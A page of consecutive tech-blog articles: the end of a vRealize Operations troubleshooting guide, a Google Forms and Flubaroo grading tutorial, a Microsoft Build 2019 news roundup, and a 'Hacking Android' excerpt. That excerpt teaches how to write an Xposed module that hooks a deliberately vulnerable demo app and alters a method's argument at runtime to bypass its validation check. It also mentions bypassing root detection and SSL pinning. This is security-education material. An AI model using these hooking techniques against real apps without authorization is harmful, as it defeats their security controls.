By restarting the FSDB, you can trigger synchronization of all the data by getting missing data from other FSDBs. Synchronization takes place only when you have vRealize Operations HA configured.

Here are some useful log locations for FSDB (all in /usr/lib/vmware-vcops/user/log):

Analytics-<UUID>.log: Used to check the Sharding Module functionality; can trace which objects have synced
ShardingManager_<UUID>.log: Can be used to get the total time the sync took
fsdb-accessor-<UUID>.log: Provides information on FSDB database cleanup and other disk-related information

Platform-cli

Platform-cli is a tool with which we can get information from various databases, including the GemFire cache, Cassandra, and the Alerts/HIS persistence databases.
In order to run this Python script, you need to run the following command:

$VMWARE_PYTHON_BIN /usr/lib/vmware-vcops/tools/vrops-platform-cli/vrops-platform-cli.py

The following example of using this command lists all the resources in ascending order and also shows you which shard each is stored on:

$VMWARE_PYTHON_BIN /usr/lib/vmware-vcops/tools/vrops-platform-cli/vrops-platform-cli.py getResourceToShardMapping

We discussed how to troubleshoot some of the most important components, such as services and databases, along with troubleshooting failures in the upgrade process. To learn more about self-monitoring dashboards and infrastructure compliance, check out the book Mastering vRealize Operations Manager - Second Edition.

What to expect from vSphere 6.7
Introduction to SDN – Transformation from legacy to SDN
Learning Basic PowerCLI Concepts
Google Forms for Multiple Choice and Fill-in-the-blank Assignments

Packt
28 Sep 2016
14 min read
In this article by Michael Zhang, the author of the book Teaching with Google Classroom, we will see how to create multiple choice and fill-in-the-blank assignments using Google Forms. (For more resources related to this topic, see here.)

The third-party app Flubaroo will help grade multiple choice, fill-in-the-blank, and numeric questions. Before you can use Flubaroo, you will need to create the assignment and deploy it on Google Classroom. The Forms app within Google Apps for Education (GAFE) allows you to create online surveys, which you can use as assignments. Google Forms then outputs the values of the form into a Google Sheet, where the Google Sheets add-on Flubaroo grades the assignment.

After using Google Forms and Flubaroo for assignments, you may decide to also use them for exams. However, while Google Forms provides a means for creating the assessment and Google Classroom allows you to easily distribute it to your students, there is no method to maintain the security of the assessment. Therefore, if you choose to use this tool for summative assessment, you will need to determine an appropriate level of security. (Often, there is nothing that prevents students from opening a new tab and searching for an answer or from messaging classmates.) For example, in my classroom, I adjusted the desks so that there was room at the back of the classroom to pace during a summative assessment. Additionally, some school labs include a teacher's desktop that has software to monitor student desktops. Whatever method you choose, take precautions to ensure the authenticity of student results when assessing students online.

Google Forms is a vast Google app that requires its own book to fully explore its functionality. Therefore, the various features you will explore in this article will focus on the scope of creating and assessing multiple choice and fill-in-the-blank assignments.
However, once you are familiar with Google Forms, you will find additional applications. For example, in my school, I work with the administration to create forms to collect survey data from stakeholders such as staff, students, and parents. Recently, for our school's annual Open House, I created a form to record the number of student volunteers so that enough food for the volunteers would be ordered. Also, during our school's major fundraiser, I developed a Google Form for students to record donations so that reports could be generated from the information more quickly than ever before. The possibilities of using Google Forms within a school environment are endless!

In this article, you will explore the following topics:

Creating an assignment with Google Forms
Installing the Flubaroo Google Sheets add-on
Assessing an assignment with Flubaroo

Creating a Google Form

Since Google Forms is not as well known as apps such as Gmail or Google Calendar, it may not be immediately visible in the App Launcher. To create a Google Form, follow these instructions:

In the App Launcher, click on the More section at the bottom.
Click on the Google Forms icon. If there is still no Google Forms app icon, open a new tab and type forms.google.com into the address bar.
Click on the Blank template to create a new Google Form.

Google Forms has a recent update to Google's Material Design interface. This article will use screenshots from the new Google Forms look. Therefore, if you see a banner with Try the new Google Forms, click on the banner to launch the new Google Forms app.

To name the Google Form, click on Untitled form in the top-left corner and type in the name. This will also change the name of the form.
If necessary, you can click on the form title to change the title afterwards: Optionally, you can add a description to the Google Form directly below the form title: Often, I use the description to provide further instructions or information such as time limit, whether dictionaries or other reference books are permissible or even website addresses to where they can find information related to the assignment. Adding questions to a Google form By default, each new Google Form will already have a multiple choice card inserted into the form. In order to access the options, click on anywhere along the white area beside Untitled Question: The question will expand to form a question card where you can make changes to the question: Type the question stem in the Untitled Question line. Then, click on Option 1 to create a field to change it to a selection: To add additional selectors, click on the Add option text below the current selector or simply press the Enter key on the keyboard to begin the next selector. Because of the large number of options in a question card, the following screenshot provides a brief description of these options: A: Question title B: Question options C: Move the option indicator. Hovering your mouse over an option will show this indicator that you can click and drag to reorder your options. D: Move the question indicator. Clicking and dragging this indicator will allow you to reorder your questions within the assignment. E: Question type drop-down menu. There are several types of questions you can choose from. However, not all will work with the Flubaroo grading add-on. The following screenshot displays all question types available: F: Remove option icon. G: Duplicate question button. Google Forms will make a copy of the current question. H: Delete question button. I: Required question switch. By enabling this option, students must answer this question in order to complete the assignment. J: More options menu. 
Depending on the type of question, this section will provide options to enable a hint field below the question title field, create nonlinear multiple choice assignments, and validate data entered into a specific field. Flubaroo grades the assignment from the Google Sheet that Google Forms creates. It matches the responses of the students with an answer key. While there is tolerance for case sensitivity and a range of number values, it cannot effectively grade answers in the sentence or paragraph form. Therefore, use only short answers for the fill-in-the-blank or numerical response type questions and avoid using paragraph questions altogether for Flubaroo graded assignments. Once you have completed editing your question, you can use the side menu to add additional questions to your assignment. You can also add section headings, images, YouTube videos, and additional sections to your assignment. The following screenshot provides a brief legend for the icons:   To create a fill-in-the-blank question, use the short answer question type. When writing the question stem, use underscores to indicate where the blank is in the question. You may need to adjust the wording of your fill-in-the-blank questions when using Google Forms. Following is an example of a fill-in-the-blank question: Identify your students Be sure to include fields for your students name and e-mail address. The e-mail address is required so that Flubaroo can e-mail your student their responses when complete. Google Forms within GAFE also has an Automatically collect the respondent's username option in the Google Form's settings, found in the gear icon. If you use the automatic username collection, you do not need to include the name and e-mail fields. Changing the theme of a Google form Once you have all the questions in your Google Form, you can change the look and feel of the Google Form. 
To change the theme of your assignment, use the following steps: Click on the paint palette icon in the top-right corner of the Google Form: For colors, select the desired color from the options available. If you want to use an image theme, click on the image icon at the bottom right of the menu: Choose a theme image. You can narrow the type of theme visible by clicking on the appropriate category in the left sidebar: Another option is to upload your own image as the theme. Click on the Upload photos option in the sidebar or select one image from your Google Photos using the Your Albums option. The application for Google Forms within the classroom is vast. With the preceding features, you can add images and videos to your Google Form. Furthermore, in conjunction with the Google Classroom assignments, you can add both a Google Doc and a Google Form to the same assignment. An example of an application is to create an assignment in Google Classroom where students must first watch the attached YouTube video and then answer the questions in the Google Form. Then Flubaroo will grade the assignment and you can e-mail the students their results. Assigning the Google Form in Google Classroom Before you assign your Google Form to your students, preview the form and create a key for the assignment by filling out the form first. By doing this first, you will catch any errors before sending the assignment to your students, and it will be easier to find the key when you have to grade the assignment later. Click on the eye-shaped preview icon in the top-right corner of the Google Form to go to the live form: Fill out the form with all the correct answers. To find this entry later, I usually enter KEY in the name field and my own e-mail address for the e-mail field. Now the Google Form is ready to be assigned in Google Classroom. In Google Classroom, once students have submitted a Google Form, Google Classroom will automatically mark the assignment as turned in. 
Therefore, if you are adding multiple files to an assignment, add the Google Form last and avoid adding multiple Google Forms to a single assignment. To add a Google Form to an assignment, follow these steps: In the Google Classroom assignment, click on the Google Drive icon: Select the Google Form and click on the Add button: Add any additional information and assign the assignment. Installing Flubaroo Flubaroo, like Goobric and Doctopus, is a third-party app that provides additional features that help save time grading assignments. Flubaroo requires a one-time installation into Google Sheets before it can grade Google Form responses. While we can install the add-on in any Google Sheet, the following steps will use the Google Sheet created by Google Forms: In the Google Form, click on the RESPONSES tab at the top of the form: Click on the Google Sheets icon: A pop-up will appear. The default selection is to create a new Google Sheet. Click on the CREATE button: A new tab will appear with a Google Sheet with the Form's responses. Click on the Add-ons menu and select Get add-ons…: Flubaroo is a popular add-on and may be visible in the first few apps to click on. If not, search for the app with the search field and then click on it in the search results. Click on the FREE button: The permissions pop-up will appear. Scroll to the bottom and click on the Allow button to activate Flubaroo: A pop-up and sidebar will appear in Google Sheets to provide announcements and additional instructions to get started: Assessing using Flubaroo When your students have submitted their Google Form assignment, you can grade them with Flubaroo. There are two different settings for grading with it—manual and automatic. Manual grading will only grade responses when you initiate the grading; whereas, automatic grading will grade responses as they are submitted. 
Manual grading To assess a Google Form assignment with Flubaroo, follow these steps: If you have been following along from the beginning of the article, select Grade Assignment in the Flubaroo submenu of the Add-ons menu: If you have installed Flubaroo in a Google Sheet that is not the form responses, you will need to first select Enable Flubaroo in this sheet in the Flubaroo submenu before you will be able to grade the assignment: A pop-up will guide you through the various settings of Flubaroo. The first page is to confirm the columns in the Google Sheet. Flubaroo will guess whether the information in a column identifies the student or is graded normally. Under the Grading Options drop-down menu, you can also select Skip Grading or Grade by Hand. If the question is undergoing normal grading, you can choose how many points each question is worth. Click on the Continue button when all changes are complete: In my experience, Flubaroo accurately guesses which fields identify the student. Therefore, I usually do not need to make changes to this screen unless I am skipping questions or grading certain ones by hand. The next page shows all the submissions to the form. Click on the radio button beside the submission that is the key and then click on the Continue button: Flubaroo will show a spinning circle to indicate that it is grading the assignment. It will finish when you see the following pop-up: When you close the pop-up, you will see a new sheet created in the Google Sheet summarizing the results. You will see the class average, the grades of individual students as well as the individual questions each student answered correctly: Once Flubaroo grades the assignment, you can e-mail students the results. In the Add-ons menu, select Share Grades under the Flubaroo submenu: A new pop-up will appear. 
It will have options to select the appropriate column for the e-mail of each submission, the method to share grades with the students, whether to list the questions so that students know which questions they got right and which they got wrong, whether to include an answer key, and a message to the students. The methods to share grades include e-mail, a file in Google Drive, or both. Once you have chosen your selections, click on the Continue button: A pop-up will confirm that the grades have successfully been e-mailed. Google Apps has a daily quota of 2,000 sent e-mails (including those sent in Gmail or any other Google App). While this is normally not an issue, if you are using Flubaroo on a large scale, such as a district-wide Google Form, this limit may prevent you from e-mailing results to students. In this case, use the Google Drive option instead. If needed, you can regrade submissions. By selecting this option in the Flubaroo submenu, you will be able to change settings, such as using a different key, before Flubaroo regrades all the submissions. 
If you have not graded the assignment manually, when you select Enable Autograde, you will be prompted by a pop-up to set up grading and e-mailing settings, as shown in the following screenshot. Clicking on the Ok button will take you through the setting pages shown in the preceding Manual grading section: Summary In this article, you learned how to create a Google Form, assign it in Google Classroom, and grade it with the Google Sheet's Flubaroo add-on. Using all these apps to enhance Google Classroom shows how the apps in the GAFE suite interact with each other to provide a powerful tool for you. Resources for Article: Further resources on this subject: Mapping Requirements for a Modular Web Shop App [article] Using Spring JMX within Java Applications [article] Fine Tune Your Web Application by Profiling and Automation [article]
Packt
13 Jul 2016
6 min read

Hacking Android Apps Using the Xposed Framework

In this article by Srinivasa Rao Kotipalli and Mohammed A. Imran, authors of Hacking Android, we will discuss Android security, which is one of the most prominent emerging topics today. Attacks on mobile devices fall into various categories, such as exploiting vulnerabilities in the kernel, attacking vulnerable apps, tricking users into downloading and running malware that steals personal data from the device, and running misconfigured services on the device. OWASP has also released the Mobile Top 10 list, helping the community better understand mobile security as a whole. Although it is hard to cover a lot in a single article, let's look at an interesting topic: the runtime manipulation of Android applications. Runtime manipulation is controlling application flow at runtime. There are multiple tools and techniques out there to perform runtime manipulation on Android. This article discusses using the Xposed framework to hook onto Android apps. Let's begin! Xposed is a framework that enables developers to write custom modules for hooking onto Android apps and thus modifying their flow at runtime. It was released by rovo89 in 2012. It works by placing a replacement app_process binary in the /system/bin/ directory, replacing the original app_process binary. app_process is the binary responsible for starting the Zygote process. Basically, when an Android phone is booted, init runs /system/bin/app_process and gives the resulting process the name Zygote. Using the Xposed framework, we can hook onto any process that is forked from the Zygote process. To demonstrate the capabilities of the Xposed framework, I have developed a custom vulnerable application. The package name of the vulnerable app is com.androidpentesting.hackingandroidvulnapp1. The code in the following screenshot shows how the vulnerable application works: This code has a method, setOutput, that is called when the button is clicked. 
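The vulnerable code itself appears in the book only as a screenshot. As a hedged sketch reconstructed from the description (the class name and exact layout are assumptions, not the book's code), the logic amounts to something like this in plain Java:

```java
// Sketch of the vulnerable app's logic, reconstructed from the article's
// description; the class name VulnCheck and the exact structure are
// assumptions -- the original is an Android Activity shown as a screenshot.
public class VulnCheck {

    // Mirrors the app's setOutput(int i): the text Cracked is shown only
    // when i equals 1; any other value yields the failure message.
    public static String setOutput(int i) {
        if (i == 1) {
            return "Cracked";
        }
        return "You cant crack it";
    }

    public static void main(String[] args) {
        int i = 0; // the app initializes i to 0, so the check can never pass
        System.out.println(setOutput(i)); // prints: You cant crack it
    }
}
```

Because i is hardcoded to 0 before the call, the only way to reach the Cracked branch without rebuilding the app is to change the argument at runtime, which is exactly what the Xposed hook below does.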
When setOutput is called, the value of i is passed to it as an argument. If you notice, the value of i is initialized to 0. Inside the setOutput function, there is a check to see whether the value of i is equal to 1. If it is, this application will display the text Cracked. But since the initialized value is 0, this app always displays the text You cant crack it. Running the application in an emulator looks like this: Now, our goal is to write an Xposed module to modify the functionality of this app at runtime and thus print the text Cracked. First, download and install the Xposed APK file in your emulator. Xposed can be downloaded from the following link: http://dl-xda.xposed.info/modules/de.robv.android.xposed.installer_v32_de4f0d.apk Install the downloaded APK file using the following command: adb install [file name].apk Once you've installed this app, launch it, and you should see the following screen: At this stage, make sure that you have everything set up before you proceed. Once you are done with the setup, navigate to the Modules tab, where we can see all the installed Xposed modules. The following figure shows that we currently don't have any modules installed: We will now create a new module to achieve the goal of printing the text Cracked in the target application shown earlier. We will use Android Studio to develop this custom module. Here is the step-by-step procedure to simplify the process: The first step is to create a new project in Android Studio by choosing the Add No Activity option, as shown in the following screenshot. I named it XposedModule. The next step is to add the XposedBridgeAPI library so that we can use Xposed-specific methods within the module. Download the library from the following link: http://forum.xda-developers.com/attachment.php?attachmentid=2748878&d=1400342298 Create a folder called provided within the app directory and place this library inside the provided directory. 
Now, create a folder called assets inside the app/src/main/ directory, and create a new file called xposed_init. We will add contents to this file in a later step. After completing the first three steps, our project directory structure should look like this: Now, open the build.gradle file under the app folder, and add the following line under the dependencies section: provided files('provided/[file name of the Xposed   library.jar]') In my case, it looks like this: Create a new class and name it XposedClass, as shown here: After you're done creating a new class, the project structure should look as shown in the following screenshot: Now, open the xposed_init file that we created earlier, and place the following content in it. com.androidpentesting.xposedmodule.XposedClass This looks like the following screenshot: Now, let's provide some information about the module by adding the following content to AndroidManifest.xml: <meta-data android:name="xposedmodule" android:value="true" />   <meta-data android:name="xposeddescription" android:value="xposed module to bypass the validation" />     <meta-data android:name="xposedminversion" android:value="54" /> Make sure that you add this content to the application section as shown here: Finally, write the actual code within the XposedClass to add a hook. 
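The hook class itself is shown in the book as a screenshot. A hedged sketch of what such a hook might look like follows; the Xposed API types and the findAndHookMethod call are real (from the XposedBridgeAPI library added above), but the hooked class name MainActivity is an assumption, since the target app's source is not reproduced here. This sketch compiles only against the Xposed library placed in the provided folder; it is not standalone-runnable.

```java
// Hedged sketch of the Xposed hook described in the article. Assumption:
// the vulnerable app declares setOutput(int) in its MainActivity class.
import de.robv.android.xposed.IXposedHookLoadPackage;
import de.robv.android.xposed.XC_MethodHook;
import de.robv.android.xposed.XposedBridge;
import de.robv.android.xposed.XposedHelpers;
import de.robv.android.xposed.callbacks.XC_LoadPackage.LoadPackageParam;

public class XposedClass implements IXposedHookLoadPackage {

    private static final String PACKAGE_TO_HOOK =
            "com.androidpentesting.hackingandroidvulnapp1";
    // Assumed class and method names for illustration only
    private static final String CLASS_TO_HOOK = PACKAGE_TO_HOOK + ".MainActivity";
    private static final String FUNCTION_TO_HOOK = "setOutput";

    @Override
    public void handleLoadPackage(LoadPackageParam lpparam) throws Throwable {
        // Only act when the target app's process is being loaded
        if (!lpparam.packageName.equals(PACKAGE_TO_HOOK)) {
            return;
        }
        XposedHelpers.findAndHookMethod(CLASS_TO_HOOK, lpparam.classLoader,
                FUNCTION_TO_HOOK, int.class, new XC_MethodHook() {
                    @Override
                    protected void beforeHookedMethod(MethodHookParam param) {
                        // Force the argument to 1 so the i == 1 check passes
                        // and the app displays the text Cracked
                        param.args[0] = 1;
                        XposedBridge.log("setOutput hooked; argument forced to 1");
                    }
                });
    }
}
```

The beforeHookedMethod callback runs before the original setOutput executes, so overwriting param.args[0] changes the value the app's own code sees, without modifying the APK.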
Here is the piece of code that actually bypasses the validation being done in the target application: Here's what we have done in the previous code: Firstly, our class is implementing IXposedHookLoadPackage We wrote the method implementation for the handleLoadPackage method—this is mandatory when we implement IXposedHookLoadPackage We set up the string values for classToHook and functionToHook An if condition is written to see whether the package name equals the target package name If package name matches, execute the custom code provided inside beforeHookedMethod Within the beforeHookedMethod, we are setting the value of i to 1 and thus when this button is clicked, the value of i will be considered as 1, and the text Cracked will be displayed as a toast message Compile and run this application just like any other Android app, and then check the Modules section of Xposed application. You should see a new module with the name XposedModule, as shown here: Select the module and reboot the emulator. Once the emulator has restarted, run the target application and click on the Crack Me button. As you can see in the screenshot, we have modified the application's functionality at runtime without actually modifying its original code. We can also see the logs by tapping on the Logs section. You can observe the XposedBridge.log method in the source code shown previously. This is the method used to log the following data shown: Summary Xposed without a doubt is one of the best frameworks available out there. Understanding frameworks such as Xposed is essential to understanding Android application security. This article demonstrated the capabilities of the Xposed framework to manipulate the apps at runtime. A lot of other interesting things can be done using Xposed, such as bypassing root detection and SSL pinning. 
Further resources on this subject: Speeding up Gradle builds for Android [article] https://www.packtpub.com/books/content/incident-response-and-live-analysis [article] Mobile Forensics [article]

Sugandha Lahoti
07 May 2019
10 min read

Microsoft Build 2019: Microsoft showcases new updates to MS 365 platform with focus on AI and developer productivity

At the ongoing Microsoft Build 2019 conference, Microsoft has announced a ton of new features and tool releases with a focus on innovation using AI and mixed reality with the intelligent cloud and the intelligent edge. In his opening keynote, Microsoft CEO Satya Nadella outlined the company’s vision and developer opportunity across Microsoft Azure, Microsoft Dynamics 365 and IoT Platform, Microsoft 365, and Microsoft Gaming. “As computing becomes embedded in every aspect of our lives, the choices developers make will define the world we live in,” said Satya Nadella, CEO, Microsoft. “Microsoft is committed to providing developers with trusted tools and platforms spanning every layer of the modern technology stack to build magical experiences that create new opportunity for everyone.” https://youtu.be/rIJRFHDr1QE Increasing developer productivity in Microsoft 365 platform Microsoft Graph data connect Microsoft Graphs are now powered with data connectivity, a service that combines analytics data from the Microsoft Graph with customers’ business data. Microsoft Graph data connect will provide Office 365 data and Microsoft Azure resources to users via a toolset. The migration pipelines are deployed and managed through Azure Data Factory. Microsoft Graph data connect can be used to create new apps shared within enterprises or externally in the Microsoft Azure Marketplace. It is generally available as a feature in Workplace Analytics and also as a standalone SKU for ISVs. More information here. Microsoft Search Microsoft Search works as a unified search experience across all Microsoft apps-  Office, Outlook, SharePoint, OneDrive, Bing and Windows. It applies AI technology from Bing and deep personalized insights surfaced by the Microsoft Graph to personalized searches. 
Other features included in Microsoft Search are: Search box displacement Zero query typing and key-phrase suggestion feature Query history feature, and personal search query history Administrator access to the history of popular searches for their organizations, but not to search history for individual users Files/people/site/bookmark suggestions Microsoft Search will begin publicly rolling out to all Microsoft 365 and Office 365 commercial subscriptions worldwide at the end of May. Read more on MS Search here. Fluid Framework As the name suggests Microsoft's newly launched Fluid framework allows seamless editing and collaboration between different applications. Essentially, it is a web-based platform and componentized document model that allows users to, for example, edit a document in an application like Word and then share a table from that document in Microsoft Teams (or even a third-party application) with real-time syncing. Microsoft says Fluid can translate text, fetch content, suggest edits, perform compliance checks, and more. The company will launch the software developer kit and the first experiences powered by the Fluid Framework later this year on Microsoft Word, Teams, and Outlook. Read more about Fluid framework here. Microsoft Edge new features Microsoft Build 2019 paved way for a bundle of new features to Microsoft’s flagship web browser, Microsoft Edge. New features include: Internet Explorer mode: This mode integrates Internet Explorer directly into the new Microsoft Edge via a new tab. This allows businesses to run legacy Internet Explorer-based apps in a modern browser. Privacy Tools: Additional privacy controls which allow customers to choose from 3 levels of privacy in Microsoft Edge—Unrestricted, Balanced, and Strict. These options limit third parties to track users across the web.  “Unrestricted” allows all third-party trackers to work on the browser. “Balanced” prevents third-party trackers from sites the user has not visited before. 
And “Strict” blocks all third-party trackers. Collections: Collections allows users to collect, organize, share and export content more efficiently and with Office integration. Microsoft is also migrating Edge as a whole over to Chromium. This will make Edge easier to develop for by third parties. For more details, visit Microsoft’s developer blog. New toolkit enhancements in Microsoft 365 Platform Windows Terminal Windows Terminal is Microsoft’s new application for Windows command-line users. Top features include: User interface with emoji-rich fonts and graphics-processing-unit-accelerated text rendering Multiple tab support and theming and customization features Powerful command-line user experience for users of PowerShell, Cmd, Windows Subsystem for Linux (WSL) and all forms of command-line application Windows Terminal will arrive in mid-June and will be delivered via the Microsoft Store in Windows 10. Read more here. React Native for Windows Microsoft announced a new open-source project for React Native developers at Microsoft Build 2019. Developers who prefer to use the React/web ecosystem to write user-experience components can now leverage those skills and components on Windows by using “React Native for Windows” implementation. React for Windows is under the MIT License and will allow developers to target any Windows 10 device, including PCs, tablets, Xbox, mixed reality devices and more. The project is being developed on GitHub and is available for developers to test. More mature releases will follow soon. Windows Subsystem for Linux 2 Microsoft rolled out a new architecture for Windows Subsystem for Linux: WSL 2 at the MSBuild 2019. Microsoft will also be shipping a fully open-source Linux kernel with Windows specially tuned for WSL 2. New features include massive file system performance increases (twice as much speed for file-system heavy operations, such as Node Package Manager install). WSL also supports running Linux Docker containers. 
The next generation of WSL arrives for Insiders in mid-June. More information here. New releases in multiple Developer Tools .NET 5 arrives in 2020 .NET 5 is the next major version of the .NET Platform which will be available in 2020. .NET 5 will have all .NET Core features as well as more additions: One Base Class Library containing APIs for building any type of application More choice on runtime experiences Java interoperability will be available on all platforms. Objective-C and Swift interoperability will be supported on multiple operating systems .NET 5 will provide both Just-in-Time (JIT) and Ahead-of-Time (AOT) compilation models to support multiple compute and device scenarios. .NET 5 also will offer one unified toolchain supported by new SDK project types as well as a flexible deployment model (side-by-side and self-contained EXEs) Detailed information here. ML.NET 1.0 ML.NET is Microsoft’s open-source and cross-platform framework that runs on Windows, Linux, and macOS and makes machine learning accessible for .NET developers. Its new version, ML.NET 1.0, was released at the Microsoft Build Conference 2019 yesterday. Some new features in this release are: Automated Machine Learning Preview: Transforms input data by selecting the best performing ML algorithm with the right settings. AutoML support in ML.NET is in preview and currently supports Regression and Classification ML tasks. ML.NET Model Builder Preview: Model Builder is a simple UI tool for developers which uses AutoML to build ML models. It also generates model training and model consumption code for the best performing model. ML.NET CLI Preview: ML.NET CLI is a dotnet tool which generates ML.NET Models using AutoML and ML.NET. The ML.NET CLI quickly iterates through a dataset for a specific ML Task and produces the best model. Visual Studio IntelliCode, Microsoft’s tool for AI-assisted coding Visual Studio IntelliCode, Microsoft’s AI-assisted coding is now generally available. 
It is essentially an enhanced IntelliSense, Microsoft’s extremely popular code completion tool. Intellicode is trained by using the code of thousands of open-source projects from GitHub that have at least 100 stars. It is available for C# and XAML for Visual Studio and Java, JavaScript, TypeScript, and Python for Visual Studio Code. IntelliCode also is included by default in Visual Studio 2019, starting in version 16.1 Preview 2. Additional capabilities, such as custom models, remain in public preview. Visual Studio 2019 version 16.1 Preview 2 Visual Studio 2019 version 16.1 Preview 2 release includes IntelliCode and the GitHub extensions by default. It also brings out of preview the Time Travel Debugging feature introduced with version 16.0. Also includes multiple performances and productivity improvements for .NET and C++ developers. Gaming and Mixed Reality Minecraft AR game for mobile devices At the end of Microsoft’s Build 2019 keynote yesterday, Microsoft teased a new Minecraft game in augmented reality, running on a phone. The teaser notes that more information will be coming on May 17th, the 10-year anniversary of Minecraft. https://www.youtube.com/watch?v=UiX0dVXiGa8 HoloLens 2 Development Edition and unreal engine support The HoloLens 2 Development Edition includes a HoloLens 2 device, $500 in Azure credits and three-months free trials of Unity Pro and Unity PiXYZ Plugin for CAD data, starting at $3,500 or as low as $99 per month. The HoloLens 2 Development Edition will be available for preorder soon and will ship later this year. Unreal Engine support for streaming and native platform integration will be available for HoloLens 2 by the end of May. Intelligent Edge and IoT Azure IoT Central new features Microsoft Build 2019 also featured new additions to Azure IoT Central, an IoT software-as-a-service solution. 
Better rules processing and customs rules with services like Azure Functions or Azure Stream Analytics Multiple dashboards and data visualization options for different types of users Inbound and outbound data connectors, so that operators can integrate with   systems Ability to add custom branding and operator resources to an IoT Central application with new white labeling options New Azure IoT Central features are available for customer trials. IoT Plug and Play IoT Plug and Play is a new, open modeling language to connect IoT devices to the cloud seamlessly without developers having to write a single line of embedded code. IoT Plug and Play also enable device manufacturers to build smarter IoT devices that just work with the cloud. Cloud developers will be able to find IoT Plug and Play enabled devices in Microsoft’s Azure IoT Device Catalog. The first device partners include Compal, Kyocera, and STMicroelectronics, among others. Azure Maps Mobility Service Azure Maps Mobility Service is a new API which provides real-time public transit information, including nearby stops, routes and trip intelligence. This API also will provide transit services to help with city planning, logistics, and transportation. Azure Maps Mobility Service will be in public preview in June. Read more about Azure Maps Mobility Service here. KEDA: Kubernetes-based event-driven autoscaling Microsoft and Red Hat collaborated to create KEDA, which is an open-sourced project that supports the deployment of serverless, event-driven containers on Kubernetes. It can be used in any Kubernetes environment — in any public/private cloud or on-premises such as Azure Kubernetes Service (AKS) and Red Hat OpenShift. KEDA has support for built-in triggers to respond to events happening in other services or components. This allows the container to consume events directly from the source, instead of routing through HTTP. 
KEDA also presents a new hosting option for Azure Functions that can be deployed as a container in Kubernetes clusters. Securing elections and political campaigns ElectionGuard SDK and Microsoft 365 for Campaigns ElectionGuard is a free open-source software development kit (SDK), released as an extension of Microsoft's Defending Democracy Program, to enable end-to-end verifiability and improved risk-limiting audit capabilities for elections in voting systems. Microsoft 365 for Campaigns provides the security capabilities of Microsoft 365 Business to political parties and individual candidates. More details here. Microsoft Build is in its 6th year and will continue till 8th May. The conference hosts over 6,000 attendees, with nearly 500 student-age developers and over 2,600 customers and partners in attendance. Watch it live here! Microsoft introduces Remote Development extensions to make remote development easier on VS Code Docker announces a collaboration with Microsoft's .NET at DockerCon 2019 How Visual Studio Code can help bridge the gap between full-stack development and DevOps [Sponsored by Microsoft]